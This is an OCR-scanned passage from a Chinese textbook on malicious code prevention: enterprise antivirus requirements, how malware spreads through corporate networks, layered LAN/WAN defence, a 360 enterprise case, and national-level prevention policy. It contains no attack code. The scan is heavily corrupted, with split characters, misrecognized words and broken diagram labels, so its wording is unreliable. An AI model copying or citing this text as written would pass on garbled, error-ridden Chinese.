对 方 的 渠道 达成 了 飞速 成 长 。 在 不 到 2 年 的 时 间 里 ,360 安全 卫士 没有 花 一 分 钱 广 告 费 在 
中 国 拥有 了 超过 1 亿 的 用 户 ,卡巴 斯 基 也 一 举 成 为 当时 国内 最 大 的 盒 装 杀毒 软件 厂商 。 


11.4 企业 级 恶意 代码 防治 方案 


经 过 几 十 年 的 发 展 , 尽 管 恶 意 代码 防治 技术 仍然 在 发 展 , 但 单机 用 户 的 杀毒 方案 已 经 趋 
于 稳定 。 随 着 网 络 技术 的 日 益 发 展 ,恶意 代码 的 传播 途径 越 来 越 广 , 传 播 速度 越 来 越 快 , 造 
成 的 危害 越 来 越 大 ,几乎 到 了 令 人 防不胜防 的 地 步 。 在 网 络 普及 率 非 第 高 的 今天 ,单机 用 户 
恶意 代码 防治 方案 的 重要 地 位 也 逐渐 被 企业 级 恶意 代码 防治 方案 取代 。 很 多 企业 在 建立 了 
一 个 完整 的 网 络 平 台 之 后 ,急需 一 个 切实 可 行 的 防 恶意 代码 解决 方案 , 既 要 确保 整个 企业 的 
业务 数据 不 受到 恶意 代码 的 破坏 ,又 要 保障 日 常 工作 不 受 恶 意 代码 的 侵扰 。 

防 病毒 软件 的 易 管 理性 和 全 面 防毒 功能 是 多 数 企 业 网 络 管理 者 关注 的 焦点 。 现 在 的 亚 
意 代 码 防范 软件 已 不 仅仅 是 检测 和 清除 恶意 代码 。 企 业 级 的 恶意 代码 防范 方案 应 更 加 注重 
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对 有 恶意 代码 的 防护 工作 ,通过 远程 安 闪 全 面部 蜀 防 范 软 件 , 保 证 不 出 现 漏洞 。 因 此 , 隐 程 安 
疫 、 集 中 管理 .统一 防范 策略 成 为 企业 级 恶意 代码 防范 产品 的 重要 功能 。 

目前 ,大 型 企业 网 络 系统 的 恶意 代码 防范 工作 已 不 再 是 简单 的 、 针 对 单 台 计算 机 的 检测 
及 清除 ,不 仅 需 要 建立 多 层次 的 、 立 体 的 恶意 代码 防护 体系 ,而 且 要 具备 完善 的 管理 系统 来 
设置 和 维护 恶意 代码 防护 策略 。 多 层次 的 防护 体系 是 指 在 企业 的 每 个 台式 机 上 安装 基于 台 
式 机 的 恶意 代码 防范 软件 ,在 服务 大 上 安装 基于 服务 天 的 恶意 代码 防范 软件 ,在 Internet 网 
关上 安装 基于 Internet 网 关 的 恶意 代码 防范 软件 。 因 为 对 企业 网 络 系统 来 说 ,防止 恶意 代 
码 的 攻击 并 不 是 保护 某 一 台 服 务 硕 或 台式 机 ,而 是 从 工作 站 到 服务 硕 再 到 网 关 的 全 面 保护 ， 
这 样 才能 保证 整个 企业 网 不 受 恶意 代码 的 侵害 。 

在 大 型 路 地 区 的 企业 广域网 内 ,要 保证 整个 广域网 安全 无 毒 ,首先 要 保证 每 一 个 局 域 网 
的 安全 无 毒 。 也 就 是 说 ,一 个 企业 网 的 恶意 代码 防范 体系 是 建立 在 每 个 局 域 网 的 防范 系统 
上 的 。 应 该 根据 每 个 局 域 网 的 防护 要 求 ,建立 局 域 网 恶意 代码 防范 控制 系统 ,分 别 设置 有 针 
对 性 的 防范 策略 。 从 总 部 到 分 文 机 构 , 由 上 到 下 ,各 个 局 域 网 的 防范 系统 相 结合 ,最 终 形成 
一 个 立体 的 、 完 整 的 广域网 恶意 代码 防护 体系 。 


11.4.1 企业 恶意 代码 防范 需求 


制定 恶意 代码 防范 方案 的 第 一 步 是 弄 清楚 企业 的 实际 需求 。 面 对 来 势 测 测 的 恶意 代 
码 ,企业 的 系统 管理 员 必 须 对 系统 现 有 防毒 功能 有 清晰 地 认识 和 判断 ,必须 明确 新 方案 的 目 
标 ,并 且 清 楚 需要 什么 样 的 产品 才能 实现 这 个 目标 。 

1. 企业 自身 评估 

只 有 在 系统 管理 员 对 自己 管理 的 系统 安全 程度 充分 理解 后 ,才能 设计 出 防止 恶意 代码 
破坏 的 最 佳 方案 ,承担 系统 安全 重任 。 其 实 , 对 于 一 台独 立 的 计算 机 而 言 ,恶意 代码 防范 软 
件 应 该 是 第 一 个 必须 安装 的 应 用 软件 。 对 于 一 个 网 络 系统 ,建立 先进 的 全 方位 恶意 代码 防 
范 方案 是 系统 安全 的 重要 保证 。 在 制定 企业 恶意 代码 防治 方案 以 前 ,企业 系统 管理 员 应 该 
重点 考虑 以 下 几 个 问题 。 

(1) 哪些 计算 机 正在 运行 实时 性 的 防范 软件 ? 

(2) 如 何 更 新 恶意 代码 的 特征 码 ? 

(3) 哪些 计算 机 没有 运行 恶意 代码 防范 软件 ? 

(4) 现 有 的 防范 软件 效果 和 功能 是 否 能 保证 系统 的 安全 ? 

(5) 过 去 是 否 曾 遭受 恶意 代码 的 侵害 ? 

(6) 谁 负责 处 理 用 户 恶 意 代 码 问 题 ? 

(7) 用 人 工 处 理 一 次 恶意 代码 危机 的 费用 是 多 少 ? 

(8) 计算 机 系统 停机 一 天 的 损失 是 多 少 ? 

(9) 恶意 代码 发 作 能 否 导 致 系统 次 痪 ? 

(10) 如 果 系 统 瘫 痪 或 重要 数据 丢失 ,恢复 的 费用 有 多 高 ? 

2. 影响 因素 

完善 的 企业 网 络 防毒 解决 方案 ,除了 防 病毒 软件 的 强大 功能 之 外 ,还 有 下 列 几 个 重要 的 
问题 需要 非常 严 间 的 考虑 。 
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(1) 在 每 台 机 融 都 安放 防 病毒 软件 ,很 麻烦 且 费 时 费力 。 

(2) 大 批 计 算 机 的 恶意 代码 特征 码 需 要 更 新 ,这 需要 专人 管理 。 

(3) 一 般 行政 人 员 或 不 太 了 解 计算 机 的 人 员 是 否 可 以 轻松 使 用 ,简捷 更 新 和 升级 ? 

(4) 并 不 是 每 个 使 用 者 都 知道 如 何 对 恶意 代码 防范 软件 的 一 些 功能 选项 进行 设置 , 需 
要 用 简单 的 方式 一 次 性 设 定 ,甚至 要 完全 自动 化 。 

(5) 标准 预 设 的 防毒 选项 设置 不 一 定 适用 所 有 的 工作 站 。 

(6) 很 难 分 析 统 计 恶 意 代 码 攻 击 事 件 的 次 数 \ 原 因 及 来 源 。 

(7) 用 户 可 能 会 随意 更 改 防范 策略 和 选项 设置 ,或 者 忘记 更 新 最 新 的 恶意 代码 特征 码 
和 扫描 引擎 ,甚至 印 载 恶意 代码 防范 软件 。 

(8) 移动 用 户 太 多 ,无 法 有 效 、 及 时 地 掌握 和 把 最 新 的 恶意 代码 特征 码 送 到 移动 用 户 
于 中 。 

(9) 是 否 能 够 很 方便 地 在 多 种 平台 下 进行 软件 安 流 ,维护 和 升级 。 

(10) 是 否 可 以 对 网 络 进 行 全 方位 、 多 层次 的 预防 和 过 滤 。 

3. 对 恶意 代码 防范 产品 的 要 求 

针对 上 述 问题 ,建议 在 评估 和 购买 防毒 软件 时 考虑 以 下 几 个 因素 。 

(1) 多 层次 、 全 方位 的 恶意 代码 防范 工作 环境 。 

(2) 先进 的 恶意 代码 防范 技术 。 

(3) 简易 快速 的 网 络 恶意 代码 防范 软件 安 闻 和 维护 。 

(4) 集中 和 方便 地 进行 恶意 代码 特征 码 和 扫描 引擎 的 更 新 。 

(5) 方便 、 全 面 \ 友好 的 恶意 代码 警报 和 报表 系统 管理 机 制 。 

(6) 恶意 代码 防护 自动 化 服务 机 制 。 

(7) 客户 端 防范 策略 的 强制 定义 和 执行 。 

(8) 快速 ` 有 效 地 处 理 未 知 恶 意 代 码 。 

(9) 合理 的 预算 规划 和 低廉 的 成 本 。 

(10) 良好 的 服务 与 强大 支持 。 


11.4.2 企业 网 络 的 典型 结构 


现代 化 企业 的 计算 机 网 络 是 在 一 定 的 硬件 设备 系统 构架 下 对 各 种 信息 进行 收集 、 人 处 理 
和 汇总 的 综合 应 用 体系 。 大 多 数 的 企业 网 络 都 具有 大 致 相似 的 体系 结构 ,这 种 体系 结构 的 
相似 性 表现 在 网 络 的 底层 基本 协议 构架 .操作 系统 .通信 协议 及 高 层 企 业 业 务 应 用 上 ,这 为 
通用 的 企业 网 络 恶 意 代码 防范 软件 提供 了 某 种 程度 上 的 参考 ， 

从 网 络 基 本 结构 上 看 ,一 个 典型 的 企业 网 络 包 括 网 关 、 服务器 和 客户 端 。 尽 管 不 同 的 企 
业 可 能 选择 千差万别 的 联网 设备 ,但 基本 都 是 基于 IEEE 802.2 和 802. 3 规范 以 太 网 结构 。 
事实 证 明 ,这 是 一 种 成 熟 、 经 济 的 网 络 方案 。 企 业内 部 网 和 互联 网 通过 网 关连 接 在 一 起 。 企 
业内 部 网 目前 应 用 最 多 的 是 一 种 交换 到 桌面 的 100M/1000M 快速 以 太 网 ,此 外 ,无 线 网 络 
也 越 来 越 成 为 一 种 流行 趋势 。 典 型 的 企业 网 络 基本 结构 如 图 11-1 所 示 。 

从 网 络 的 应 用 模式 上 看 ,现代 企业 网 络 都 是 基于 C/S 的 计算 模式 ,由 服务 器 来 处 理 关 
键 性 的 业务 逻辑 和 企业 核心 业务 数据 ,客户 机 处 理 用 户 界 面 及 与 用 户 的 直接 交互 。 服 务 器 
是 网 络 的 中 槐 和 信息 化 核心 ,具有 吞吐 能 力 强 存储 容量 大 和 网 络 管理 能 力 强 等 特点 。 客 户 
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图 11-1 典型 的 企业 网 络 基 本 结构 示意 图 


机 的 硬件 没有 特殊 的 要 求 ,一 般 普 通 PC 就 可 以 胜任 。 企 业 网 络 往往 有 一 台 或 多 台 主 要 的 
业务 服务 器 ,在 此 之 下 分 布 着 众多 客户 机 或 工作 站 ,以 及 不 同 的 应 用 服务 器 。 根 据 不 同 的 任 
务 和 功能 服务 ,典型 的 服务 器 应 用 类 型 有 文件 服务 器 、 邮 件 服务 器 、Web 服务 器 数据库 服 
务 器 和 应 用 服务 器 等 。 

从 操作 系统 上 看 ,企业 网 络 的 客户 端 基本 上 都 是 Windows 平台 ,中 小 企业 服务 器 一 般 
采用 Windows 系统 ,部 分 行业 用 户 或 大 型 企业 的 关键 业务 应 用 服务 器 采用 UNIX 系统 。 
Windows 平台 的 特点 是 价格 比较 便宜 ,具有 良好 的 图 形 用 户 界 面 ; 而 UNIX 系统 的 稳定 性 
和 大 数据 量 可 靠 处 理 能 力 使 得 它 更 适合 于 关键 性 业务 应 用 。 

从 通信 协议 上 看 ,企业 网 络 绝 大 部 分 采用 TCP/IP 协议 。TCP/IP 本 来 是 一 种 Internet 
的 通信 协议 ,但 是 因为 主流 操作 系统 和 绝 大 部 分 应 用 软件 的 支持 及 它 本 号 的 发 展 , 已 经 使 得 
它 足 以 承担 从 企业 内 网 到 Internet 的 主要 通信 和 重任。 此 外 ,在 企业 内 网 上 常见 的 协议 包括 
NetBIOS IJPX/SPX 等 。 


11.4.3 企业 网 络 的 典型 应 用 


企业 网 络 的 主要 应 用 包括 文件 共享 、 打 印 服 务 共享 、 办 公 自 动 化 (OA) 系 统 、 企 业 信 息 
管理 系统 (MIS)、Internet 应 用 等 。 

文件 和 打印 共享 是 企业 建 网 的 最 初 目 的 ,也 是 计算 机 网 络 的 最 基本 应 用 。 有 了 网 络 , 文 
件 再 也 不 用 通过 磁盘 来 传递 ,大 文件 的 交换 .应 用 程序 共享 等 也 更 加 方便 ,具有 权限 的 用 户 
可 以 在 自己 的 计算 机 上 使 用 共享 的 打印 机 。 

企业 网 络 应 用 达到 了 一 定 的 层次 ,就 需要 一 种 更 加 方便 的 内 部 通信 和 消息 传递 机 制 , 以 
及 工作 流程 的 协同 工作 机 制 ,于 是 就 产生 了 办 公 日 动 化 系统 。OA 系统 可 以 实现 办 公信 息 
规范 化 和 一 致 化 ,能 够 将 所 有 的 办 公文 档 汇集 在 一 起 ,方便 进行 统计 和 查找 ,并 按照 不 同 的 
权限 设置 在 企业 成 员 之 间 共 享 。 目 前 的 OA 系统 大 都 建立 在 一 个 称 为 群 件 的 软件 平台 上 ， 
最 流行 的 群 件 系统 有 IBM 的 Lotus Domino/Notes 系统 及 微软 的 Exchange/OutLook 
系统 。 

企业 管理 信息 系统 能 对 企业 的 各 种 信息 进行 收集 、 分 析 、 存 储 \ 传 输 和 维护 ,并 为 企业 管 
理 者 提供 决策 。 
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MIS 和 OA 系统 进行 业务 数据 管理 和 工作 流程 管理 ,这 些 系统 都 充分 地 利用 了 网 络 的 
数据 交换 特征 ,大量 的 文档 、 结 构 化 或 非 结 构 化 的 业务 数据 通过 网 络 来 传输 和 处 理 。 这 种 频 
繁 和 大 规模 的 文件 .数据 交换 也 为 恶意 代码 通过 网 络 传播 打开 了 便利 之 门 。 

企业 Internet 应 用 包括 企业 需要 收发 Internet 邮件 .浏览 外 部 网 页 发布 企业 信息 等 功 
能 。 所 有 这 些 都 需要 企业 内 部 网 络 与 Internet 之 间 连 接 的 畅通 无 阻 。 畅 通 的 Internet 连接 
使 得 企业 方便 地 获取 和 发 布 信息 的 同时 ,也 为 恶意 代码 的 乘虚 而 人 创造 了 条 件 。 

总 之 ,企业 应 用 需要 网 络 的 便利 信息 交换 特性 ,恶意 代码 也 可 以 充分 利用 网 络 的 特性 来 
达到 它 的 传播 目的 。 企 业 在 充分 地 利用 网 络 进行 业务 处 理 时 ,就 不 得 不 考虑 企业 的 恶意 代 
码 防范 问题 ,以 保证 关系 企业 命运 的 业务 数据 完整 且 不 被 破坏 。 


11.4.4 恶意 代码 在 网 络 上 传播 的 过 程 


目前 ,互联 网 已 经 成 为 恶意 代码 传播 最 大 的 来 源 ,电子 邮件 和 网 络 信息 传递 为 恶意 代码 
传播 打开 了 高 速 的 通道 。 企 业 网 络 化 的 发 展 也 有 助 于 恶意 代码 的 传播 速度 大 大 提高 ,感染 
的 范围 也 越 来 越 广 。 可 以 说 ,网 络 化 促进 了 恶意 代码 的 传染 效率 ,而 恶意 代码 传染 的 高 效率 
也 对 防范 产品 提出 了 新 的 要 求 。 

近 几 年 ,全 球 的 企业 网 络 经 历 了 网 络 恶 意 代 码 的 不 断 侵 柳 ,如 爱 虫 、 灰 蚀 子 、 尼 姆 达 等 ， 
可 以 算是 大 名 易 易 了 。 这 些 恶意 代码 几乎 一 夜 之 间 让 世界 为 之 震惊 ,唤醒 了 人 们 对 于 网 络 
防毒 的 重视 。 

网 络 恶意 代码 在 企业 网 络 内 部 之 所 以 能 够 快速 而 广泛 传播 ,是 因为 它们 充分 利用 了 网 
络 的 特点 。 根 据 使 用 条 件 和 环境 的 不 同 , 企 业 网 络 上 恶意 代码 的 传播 过 程 大 致 如 图 11-2 
所 示 。 


Internet 


邮件 服务 器 


ae 


— 


让 


图 11-2 ”恶意 代码 在 企业 网 上 的 传播 过 程 


图 中 虚线 “1” 表 示 互 联网 上 的 恶意 代码 经 过 防火 墙 \ 网 关 到 达 邮 件 服务 絮 , 这 样 邮件 服 

务 胡 就 染 毒 了 。 虚 线 “2” 表 示 匠 一 个 用 户 使 用 邮件 服务 融 从 而 染 毒 。 经 过 虚线 “3”, 恶 意 代 

码 扩散 到 文件 服务 天上。 虚线 “4” 表 示 通 过 资源 共享 ,文件 服务 大 感染 了 客户 端 。 虚 线 “5” 
表示 客户 端 之 间 的 交叉 感染 。 

根据 恶意 代码 在 企业 网 中 的 传播 过 程 ,可 以 归纳 出 恶意 代码 在 企业 网 中 的 几 种 传播 


第 11 章 常用 杀毒 软件 及 其 解决 方案 299 


(1) 互联 网 。 网 络 上 有 些 计算 机 具有 连接 互联 网 的 功能 ,而 互联 网 上 有 许多 可 供 下 载 
的 程序 文件、 信息 。 另 外 ,收发 E-mail 也 必须 通过 互联 网 。 这 些 都 是 恶意 代码 进入 企业 内 
部 网 络 的 入 口 。 

(2) 网 络 共享 。 当 使 用 网 上 服务 器 或 其 他 计算 机 上 带 恶 意 代码 的 共享 文件 或 开机 时 使 
用 了 服务 器 中 和 带 毒 的 引导 文件 时 ,网 络 用 户 计算 机 系统 就 可 能 被 感染 恶意 代码 ,也 可 能 将 恶 
意 代 码 感染 到 其 他 计算 机 中 共享 目录 下 的 文件 。 如 果 服 务 嚣 本身 已 感染 了 恶意 代码 , 则 连 
在 网 上 的 计算 机 在 共享 服务 器 资源 和 操作 时 ,很 容易 引起 交叉 感染 。 

(3) 客户 端 。 如 果 某 个 客户 端 不 小 心 感染 了 经 过 其 他 途径 (移动 硬盘 光盘 等 ) 传 染 的 
恶意 代码 ,就 很 容易 导致 网 络 内 部 交叉 感染 。 

由 以 上 恶意 代码 在 网 络 上 的 传播 方式 可 以 看 出 ,在 网 络 环境 下 ,恶意 代码 除了 具有 可 传 
播 性 .可 执行 性 、 破 坏 性 .可 触发 性 等 恶意 代码 的 共性 外 ,还 具有 感染 速度 快 、 扩 散 面 广 、 传 播 
形式 复杂 多 样 难以 彻底 清除 .破坏 性 大 等 新 的 特点 。 由 此 可 见 , 基 于 网 络 的 整体 解决 方案 
势 在 必 行 。 


11.4.5 企业 网 络 恶 意 代 码 防 学 方案 


麻 高 一 尺 , 道 高 一 丈 , 随 着 恶意 代码 的 不 断 发 展 ,安全 厂商 人 研发 出 不 同 的 防 病毒 安全 产 
品 予 以 应 对 ,从 传统 单机 恶意 代码 防范 跨越 到 网 络 级 的 恶意 代码 防范 ,从 单纯 多 机 防护 到 定 
点 网 关 杀 毒 ,防范 模式 有 很 大 发 展 ,逐渐 走 回 多 样 化 。 一 般 而 言 ,用 户 服务 器 、 客 户 端 的 分 布 
往往 集中 在 总 部 ,分 支 机 构 , 网 络 具 有 相应 规模 的 同时 ,也 给 恶意 代码 带 来 了 相应 的 传播 空 
间 ,一 旦 一 点 或 多 点 感染 恶意 代码 ,就 很 可 能 造成 整个 网 络 爆 发 恶意 代码 。 

1. 局 域 网 恶意 代码 防范 方案 

从 整体 上 来 讲 , 局域网 服务 需 必 须根 据 其 所 采用 的 网 络 操作 系统 (如 UNIX/Linux、 
DOS、Windows \iOS 等 操作 系统 平台 ) 配 备 相 应 恶意 代码 防范 软件 ,全 方位 地 防范 恶意 代码 
的 入 侵 。 

如 图 11-3 所 示 ,在 规模 局 域 网 内 ,还 要 配备 网 络 管理 平台 。 例 如 ,在 网 管 中 心 可 以 配备 
恶意 代码 集中 监控 中 心 ,可 以 做 到 对 整个 网 络 的 恶意 代码 疫情 进行 集中 管理 ,在 各 分 支 网 络 
也 配备 监控 中 心 ,以 提供 整体 防范 策略 配置 .恶意 代码 集中 监控 灾难 恢复 等 管理 功能 。 另 
外 ,工作 站 、 服 务 需 较 多 的 网 络 可 配备 软件 自动 分 发 中 心 ,以 减轻 网 络 管理 人 员 的 工作 量 。 

2. 广域网 络 恶意 代码 防范 方案 

广域网 恶意 代码 防御 策略 是 基于 “单机 杀毒 一 局 域 网 集中 监控 一 广域网 总 部 管理 ”三 级 
管理 模式 的 ,如 图 11-4 所 示 。 

此 外 ,还 可 以 在 局 域 网 恶意 代码 防御 的 基础 上 构建 广域网 总 部 恶意 代码 报警 查看 系统 ， 
该 系统 在 监控 本 地 .远程 异地 局 域 网 恶意 代码 防御 情况 的 同时 ,还 以 整个 集团 网 络 的 恶意 代 
码 爆 发 种 类 发生 频 度 . 易 发 生源 等 信息 做 统计 分 析 。 

3. 某 企 业 恶 意 代 码 防 范 应 用 案例 

与 个 人 计算 机 安全 不 同 ,企业 用 户 的 计算 机 安全 属于 集体 安全 范畴 ,涉及 内 网 管理 、 风 
险 控 制 .流量 监测 和 商业 机 蜜 保护 等 多 个 方面 。 联 入 内 网 系统 的 计算 机 中 ,只 要 有 一 台 计 算 
机 被 黑客 攻破 ,就 有 可 能 造成 内 网 安全 体系 的 朋 演 和 商业 机 密 的 泄露 。 
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图 11-4 多 级 恶意 代码 安全 管理 结构 图 


为 此 360 推出 360 企业 版 ,让 广大 企业 能 够 轻松 管理 企业 安全 。 特 别 是 针对 与 互联 网 
隔离 的 企业 ,360 给 出 了 专门 的 解决 方案 ,如 图 11-5 所 示 。 这 种 企业 规模 一 般 , 终 端 数 从 几 
十 台 到 几 百 台 不 等 ,网 络 管理 情况 比较 严格 ,不 允许 终端 连接 互联 网 。 所 有 终端 都 集中 在 一 


个 局 域 网 内 ,有 专门 的 网 络 管理 员 或 安全 管理 员 。 
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在 企业 内 部 部 署 控制 中 心 和 企业 版 终端 ,企业 版 终端 根据 控制 中 心 制定 的 安全 开 略 , 进 
行 体检 、 杀 毒 和 修复 漏洞 等 安全 操作 。 

使 用 隐 离 网 工具 ,定期 从 360 相关 的 服务 大 下 载 病 毒 库 、 木 马 库 .漏洞 补丁 文件 等 ,更 新 
到 控制 中 心 后 ,所 有 企业 终端 痢 可 以 上 自动 升级 和 修复 漏洞 。 

有 专人 负责 控制 中 心 的 日 稼 运行 ,定时 碍 看 各 终端 的 安全 情况 ,下 发 统一 杀毒 漏洞 修 


企业 终端 
出 hs 


复 等 策略 。 


企业 终端 理 


1 


个 业 芝 站 体检 /杀毒 / 打 补丁 控制 中 心 


图 11-5 隔离 网 环境 下 的 企业 解决 方案 


11.5 局 是 


和 是 形成 反 病 毒 产品 地 绿 性 的 主要 原因 。 


1. 和 poy 
结合 所 学 知识 ,给 出 一 个 大 型 企 事业 单位 (具有 多 层 分 支 机 构 的 单位 ) 的 计算 机 病毒 
ss 
3. 作为 一 天 成 熟 的 商业 杀毒 软件 ,应 该 具备 什么 样 的 功能 ? 
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就 目前 的 计算 机 技术 而 言 , 可 以 肯定 地 说 :“ 不 存在 能 够 防治 未 来 所 有 恶意 代码 的 软 、 
硬件 ”因此 ,“ 恶 意 代码 产生 在 前 ,防范 手段 相对 滞后 ”将 是 一 个 长 期 的 过 程 。 在 这 个 长 期 的 
过 程 中 ,如 何 有 效 利用 现 有 技术 使 系统 免 受 或 少 受 破坏 将 是 恶意 代码 防治 的 核心 工作 。 

在 网 络 迅速 发 展 的 今天 ,基于 单机 的 防范 方案 已 经 不 能 适应 时 代 的 需要 ,于 是 人 们 推出 
了 基于 网 络 环境 的 整体 解决 方案 。 在 新 型 的 防范 方案 下 ,简单 的 软件 “使 用 方法 ”和 “注意 事 
项 ”已 经 不 能 提供 系统 的 、 利 于 用 户 使 用 的 整体 思路 。 于 是 ,恶意 代码 防治 策略 这 一 概念 被 
适时 地 提出 。 恶 意 代码 防治 策略 是 恶意 代码 防护 工作 的 一 个 必要 部 分 , 它 能 帮助 用 户 从 理 
论 的 高 度 认识 防护 工作 的 重要 性 ,并 进一步 指导 用 户 的 防治 工作 。 

本 章 侧 重 于 介绍 恶意 代码 防治 的 全 局 策略 和 规章 ,包括 如 何 制订 防御 计划 ,如 何 挑选 一 
个 快速 反应 小 组 ,如 何 控制 恶意 代码 的 发 作 , 以 及 防范 工具 的 选择 等 。 

本 章 学 习 目 标 

(1) 擎 握 恶 意 代码 防治 的 基本 准则 。 

(2) 掌握 单机 用 户 防治 策略 。 

(3) 掌握 企业 级 用 户 防 治 策略 。 

(4) 了 解 恶 意 代 码 未 来 防治 措施 。 

(5) 了 解 恶 意 代 码 相 关 法 律 法 规 。 


12.1 恶意 代码 防治 梨 略 的 基本 准则 


从 恶意 代码 对 抗 的 角度 来 看 ,其 防治 策略 必须 具备 下 列 准则 。 

(1) 拒绝 访问 能 力 。 来 历 不 明 的 软件 是 恶意 代码 的 重要 载体 。 各 种 不 明 来 历 的 软件 ， 
尤其 是 通过 网 络 传 过 来 的 软件 ,不 得 进入 计算 机 系统 。 

(2) 检测 能 力 。 恶 意 代 码 总 是 有 机 会 进入 系统 ,因此 ,系统 中 应 设置 检测 恶意 代码 的 机 
制 来 阻止 外 来 恶意 代码 的 侵犯 。 除 了 检测 已 知 的 恶意 代码 外 ,能 和 否 检测 未 知 恶意 代码 (包括 
已 知行 为 模式 的 未 知 恶 意 代 码 和 未 知行 为 模式 的 未 知 恶 意 代 码 ) 也 是 一 个 衡量 恶意 代码 检 
测 能 力 的 重要 指标 。 

(3) 控制 传播 的 能 力 。 亚 意 代 码 防 治 的 历史 证 明 ,迄今 还 没有 一 种 方法 能 检测 出 所 有 
的 恶意 代码 ,更 没有 一 种 方法 能 检测 出 所 有 未 知 恶 意 代 码 , 因 此 ,被 恶意 代码 感染 将 是 一 个 
必然 事件 。 关 键 是 ,即使 恶意 代码 进入 系统 ,也 可 以 及 时 阻止 恶意 代码 在 系统 中 任意 传播 。 
因此 ,一 个 健全 的 信息 系统 必须 要 有 控制 恶意 代码 传播 的 能 力 。 

(4) 清除 能 力 。 如 果 亚 意 代 码 突破 了 系统 的 防护 ,即使 它 的 传播 受到 了 控制 ,但 也 要 有 
相应 的 措施 将 它 清除 掉 。 对 于 已 知 恶意 代码 ,可 以 使 用 专用 恶意 代码 清除 软件 。 对 于 未 知 
类 恶意 代码 ,在 发 现 后 使 用 软件 工具 对 它 进行 分 析 , 尽 快 编写 出 清除 软件 。 当 然 , 如 果 有 后 
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备 文件 ,也 可 使 用 它 直 接 履 盖 被 感染 文件 。 
(5) 恢复 能 力 。“ 在 和 恶意 代码 被 清除 以 前 ,就 已 经 破坏 了 系统 中 的 数据 ”, 这 是 非常 可 怕 


但 又 非常 可 能 发 生 的 事件 。 因 此 ,信息 系统 应 提供 一 种 高 效 的 方法 来 恢复 这 些 数据 ,使 数据 
损失 尽量 减 到 最 少 。 


(6) 蔡 代 操作 。 当 发 生 问 题 时 ,手头 没有 可 用 的 技术 来 解决 问题 ,但 是 任务 又 必须 继续 
执行 下 去 。 为 了 解决 这 种 窒 帝 ,系统 应 该 提供 一 种 蔡 代 操作 方案 : 在 系统 未 恢复 前 用 蔡 代 
系统 工作 ,等 问题 解决 以 后 再 换 回 来 。 


12.2 国家 层面 上 的 防治 末 略 


我 国 的 恶意 代码 疫情 呈现 出 两 种 趋势 : 一 种 趋 努 是 国外 流行 的 网 络 化 恶意 代码 大 肆 侵 
杰 我 国 的 计算 机 网 络 ; 另 一 种 趋势 是 出 现 大 量 本 土 恶意 代码 ,并 且 传 播 能 力 和 破坏 性 越 来 
越 吕 。 针 对 目前 日 次 增多 的 恶意 代码 ,根据 所 等 握 的 恶意 代码 的 特点 和 未 来 发 展 趋 势 ,在 此 
给 出 国家 层面 上 的 恶意 代码 防治 策略 建议 。 

1. 完善 相关 法 律 法 规 及 其 贯彻 落实 工作 


我 国 现行 (刑法 ;第 286 条 关于 破坏 计算 机 信息 系统 罪 的 相关 规定 违反 国家 规定 ,对 
计算 机 信息 系统 功能 进行 删除 修改 ,增加 ,干扰 ,造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 


严重 的 ,处 五 年 以 下 有 期 徒刑 或 者 拘役 ; 后 果 特 别 严重 的 ,处 五 年 以 上 有 期 徒刑 。 故 意 制 
作 , 传 播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 依照 以 上 的 规定 
处 罚 。 公 安 部 于 2000 年 颁布 实施 了 更 加 具体 的 《计算 机 病毒 防治 管理 办 法 》。 各 单位 应 依 
据 相 关 规 定 ,结合 各 自 的 情况 建立 恶意 代码 防治 制度 和 相应 组 织 , 将 恶意 代码 防治 工作 落 到 

2. 在 各 主干 网 络 建立 恶意 代码 预警 系统 

在 我 国 主干 网 络 和 电子 政府 、 金 融 、 证 券 、 税 务 等 专用 网 络 中 建立 恶意 代码 预警 系统 。 
监控 整个 网 络 的 恶意 代码 实时 疫情 ,及 时 发 现 、 捕 获 已 有 的 恶意 代码 和 新 出 现 的 恶意 代码 ， 
便于 及 早 人 研究 应 对 测量 ,避免 恶意 代码 大 面积 传播 造成 的 破坏 。 

3. 建立 多 层次 恶意 代码 应 急 体 系 

针对 恶意 代码 突 发 性 强 .涉及 范围 广 和 破坏 力 高 的 特点 ,为 了 有 效 降 低 其 危害 ,提高 人 
们 对 恶意 代码 的 防治 能 力 ,应 分 级 建立 快速 ` 有 效 的 恶意 代码 应 急 体 系 。 各 单位 应 设立 专门 
的 恶意 代码 防治 小 组 ,与 当地 公安 机 关 建 立 的 应 急 机 构 和 国家 的 恶意 代码 应 急 体系 建立 信 
息 交 流 机 制 , 负 责 预 防 和 疫情 上 报 工 作 。 在 疫情 呈 规 模 性 爆发 时 ,根据 国家 恶意 代码 应 急 处 
理 中 心 发 布 的 恶意 代码 疫情 公告 ,及 时 做 好 应 对 措施 ,以 减少 恶意 代码 造成 的 危害 。 

4. 建立 动态 的 系统 风险 评估 措施 

根据 系统 和 业务 特点 ,进行 恶意 代码 风险 评估 。 通 过 评估 了 解 它们 面临 的 恶意 代码 威胁 
有 哪些 ,并 清楚 哪些 风险 必须 防范 .哪些 风险 可 以 承受 。 确 定 所 能 承受 的 最 大 风险 ,以 便 制定 
相应 的 防治 策略 和 技术 防范 措施 ,并 制订 灾难 恢复 计划 。 同 时 ,根据 恶意 代码 出 现 的 新 变化 ， 
适时 地 对 系统 进行 动态 安全 评估 。 了 解 当前 面临 的 主要 风险 ,评估 防护 策略 的 有 效 性 。 
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5. 建立 恶意 代码 事故 分 析 制 度 
恶意 代码 疫情 发 生 后 ,要 认真 分 析 原 因 , 找 到 恶意 代码 破坏 防护 系统 的 突破 口 ,及 时 修 
意 代 码 防 治 策略 ,并 对 调整 后 的 恶意 代码 防治 策略 进行 重新 评估 。 
6. 制订 完备 的 备份 和 恢复 计划 
为 了 应 对 恶性 的 恶意 代码 入 侵 事 件 , 应 具备 完善 的 备份 和 恢复 计划 ,甚至 灾难 恢复 计 
划 。 备 份 和 恢复 计划 能 够 将 恶意 代码 造成 的 损失 减少 到 最 低 , 并 尽快 恢复 系统 的 正常 工作 。 

7. 提高 国内 运营 商 自 身 的 安全 性 

近年 来 ,起 源 于 我 国 的 网 络 恶 意 代码 数量 呈 上 升 趋 势 , 这 些 恶 意 代码 常常 利用 国内 网 络 
服务 的 安全 漏洞 大 肆 传 播 。 因 此 ,需要 运营 商 安 装 使 用 网 络 级 的 恶意 代码 防范 系统 ,加 强 用 
户 的 身份 认证 工作 ,与 国家 恶意 代码 应 急 处 理 中 心 建立 联动 机 制 , 及 时 发 现 恶 意 代 码 , 并 采 
